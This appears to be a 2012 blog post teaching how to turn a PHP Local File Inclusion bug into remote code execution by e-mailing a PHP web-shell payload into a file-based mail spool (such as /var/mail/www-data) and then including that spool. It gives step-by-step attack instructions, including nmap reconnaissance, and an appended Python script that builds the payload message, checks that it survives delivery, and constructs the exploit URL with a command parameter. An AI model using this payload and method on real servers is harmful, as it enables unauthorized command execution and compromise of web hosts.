Wednesday, 25 January 2012

Ordering Remote File inclusion via e-mail

I briefly discussed Local File Inclusion in this article and, more importantly, a trick you can use to turn an LFI into a Remote File Inclusion (or, more precisely, remote code injection).

This method abuses the way e-mail is stored on Linux servers (when a certain kind of Mail Delivery Agent is in use) to escalate an LFI vulnerability into an RFI-style attack, or to create an RFI attack vector on a server where none exists otherwise.


Before I can get into the actual attack, I need to talk a little about how e-mail actually works in terms of the programs that handle it; understanding the nature of these programs will help you discover attacks like this in the future.

How it all works
How the hell does this work?? Well, e-mail works by using three components

  • Mail User Agent -- The term can refer to any system capable of accessing the user's email mailbox, regardless of it being a mail user agent, a relaying server, or a human typing on a terminal --- Wikipedia
  • Mail Transfer Agent -- Within Internet message handling services (MHS), a message transfer agent or mail transfer agent (MTA) or mail relay is software that transfers electronic mail messages from one computer to another using a client–server application architecture. An MTA implements both the client (sending) and server (receiving) portions of the Simple Mail Transfer Protocol. --- Wikipedia
  • Mail Delivery Agent -- A mail delivery agent or message delivery agent (MDA) is a computer software component that is responsible for the delivery of e-mail messages to a local recipient's mailbox. Also called an LDA, or local delivery agent. --- Wikipedia

We are interested in the Mail Delivery Agent and how it behaves. There are a lot of delivery agents out there, all handling the job in different ways; the ones that will help us out are those that store mail in plain file form (typically an mbox spool such as /var/mail/<user>, or a Maildir directory under the user's home). I suggest you read about them a little, so you know what calls to make if you are looking for RFIs on a mail/web server!

How can e-mail be dangerous??
...besides the obvious ways of course :)

Well, when someone sends mail to a user on a Linux mail server, all this means (depending on the program receiving the mail) is that a file gets written into some folder where the program that reads the mail can find it for the user. Naturally you can imagine that modern security conventions will ensure that:

  • Only the user, its group and anyone with root permissions will be able to read the file
  • The mail reader program will only be able to read mail belonging to the person that executes it
The point being: nothing prevents the user from reading their own file!

So how is this an exploit then?? The above points don't deter the attack at all! In fact, if anything, they help us out! We need the user we are exploiting, in this case www-data (or apache, or whatever account your web server runs as on your system), to be able to read the file, otherwise the attack would never work!

What we will do is send a mail whose body contains content that the scripting engine running on the server will interpret as a web script (for a PHP host, a <?php ... ?> block), thus turning a simple e-mail into a remote file injection!

So when exactly is this kind of thing possible?

  • When your mail is stored on the server in a readable file!
This may be an issue that could stop your attack, but this method is just a proposal for creating RFI vulnerabilities! One thing that is good is that SMTP exploits do exist, and because of this idea, an SMTP exploit that lets you write into a mail spool is at times to be considered an RFI exploit as well (this is the whole reason I decided to post this!)

To Exploit...

The attack protocol is simple:
  1. Find an LFI vector --- dorking, CMS exploits, bruteforcing
  2. Port scan the host --- determine that it is in fact a mail server (whip out your nmap): 'nmap -sV [host]'
  3. Fingerprint the mail server software --- via the nmap output, or whatever else you need to do this with
    1. Find out where it stores the mail files --- do some research on the mail server (a file-based MDA typically writes an mbox spool such as /var/mail/<user>, or a Maildir under the user's home)
    2. and check that the mail is stored in a readable file (no database, binary, obfuscated or encrypted files will do!)
  4. Send the malicious mail --- for this you need to know the web server username, usually something like www-data, apache, etc.; you will need to read about the OS and server software to determine this. Send the body as plain 7bit/8bit text: a quoted-printable or base64 transfer encoding rewrites the payload (in quoted-printable every '=' becomes '=3D') and the script engine will not recognise it
  5. Include the mail file as the payload in the LFI vulnerability
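As an added example (not code from the original post), here is an offline simulation of steps 4 and 5 and of the "e-mail as web script" idea above: it plays the part of a file-based MDA delivering an attacker's message into an mbox spool for the web-server user, checks whether the PHP block is still byte-for-byte intact in the file an LFI would include, and builds the request that includes it. The account name www-data, the spool path /var/mail/www-data, the host target.example and the LFI parameter 'page' are assumptions chosen for the illustration; the spool is written into a temporary directory, never the real /var/mail.

```python
"""Mail-spool poisoning, simulated offline.

Added example, not code from the original post.  It acts as a file-based
MDA delivering a message for the web-server user into an mbox spool, then
checks whether the PHP payload is still intact in the file an LFI would
include.  User name, spool path, host and LFI parameter are assumptions.
"""
import mailbox
import os
import tempfile
from email.message import EmailMessage
from urllib.parse import urlencode

WEB_USER = "www-data"                  # assumed web-server account (Debian/Ubuntu style)
REAL_SPOOL = f"/var/mail/{WEB_USER}"   # where an mbox MDA would write; not touched here

# What the script engine must see verbatim.  It deliberately contains '=',
# because that is the character quoted-printable rewrites as '=3D'.
PAYLOAD = "<?php $c = $_GET['cmd']; system($c); ?>"


def build_message(sender, recipient, payload, cte="7bit"):
    """The message the attacker hands to the MTA over SMTP.

    cte is the Content-Transfer-Encoding.  7bit and 8bit store the body as
    typed; quoted-printable turns '=' into '=3D' and base64 hides the whole
    body, so neither survives include() as PHP.
    """
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = "hi"
    msg.set_content(payload, cte=cte)
    return msg


def deliver_to_spool(msg, spool_path):
    """Act as a file-based MDA: append the message to an mbox spool.

    A real MDA also takes a lock on the spool; omitted here for brevity.
    """
    box = mailbox.mbox(spool_path)
    try:
        box.add(msg)        # writes the 'From ' separator, headers, blank line, body
    finally:
        box.close()         # close() flushes to disk
    os.chmod(spool_path, 0o600)   # owner-only: www-data can still read its own spool
    return spool_path


def spool_contents(spool_path):
    """Read the spool exactly as include() would: raw bytes, headers and all."""
    with open(spool_path, "rb") as f:
        return f.read()


def payload_survives(spool_path, payload=PAYLOAD):
    """True if the PHP block appears verbatim somewhere in the spool file."""
    return payload.encode("ascii") in spool_contents(spool_path)


def lfi_url(base, param, path, cmd):
    """The request that makes the vulnerable script include the spool file."""
    return f"{base}?{urlencode({param: path, 'cmd': cmd})}"


def poison_spool(cte="7bit"):
    """Run the whole pipeline against a throwaway spool and report the result."""
    with tempfile.TemporaryDirectory() as d:
        spool = os.path.join(d, WEB_USER)       # stands in for /var/mail/www-data
        msg = build_message("attacker@example.net", f"{WEB_USER}@target.example",
                            PAYLOAD, cte=cte)
        deliver_to_spool(msg, spool)
        raw = spool_contents(spool)
        return {
            "cte": cte,
            "is_mbox": raw.startswith(b"From "),            # mbox separator line
            "mode": oct(os.stat(spool).st_mode & 0o777),
            "survives": payload_survives(spool),
            # the body is everything after the first blank line of the message
            "body": raw.split(b"\n\n", 1)[1].decode("ascii", "replace").strip(),
            "url": lfi_url("http://target.example/index.php", "page", REAL_SPOOL, "id"),
        }


if __name__ == "__main__":
    for enc in ("7bit", "quoted-printable", "base64"):
        r = poison_spool(enc)
        print(f"{r['cte']:>17}: survives={r['survives']}  body={r['body']!r}")
    print(poison_spool()["url"])
```

Running it shows the 7bit body landing in the spool verbatim, while the quoted-printable and base64 variants arrive mangled and would never parse as PHP. The message headers end up in the spool too, but that does not matter: include() simply echoes them as text and executes the <?php ... ?> block it finds in the body.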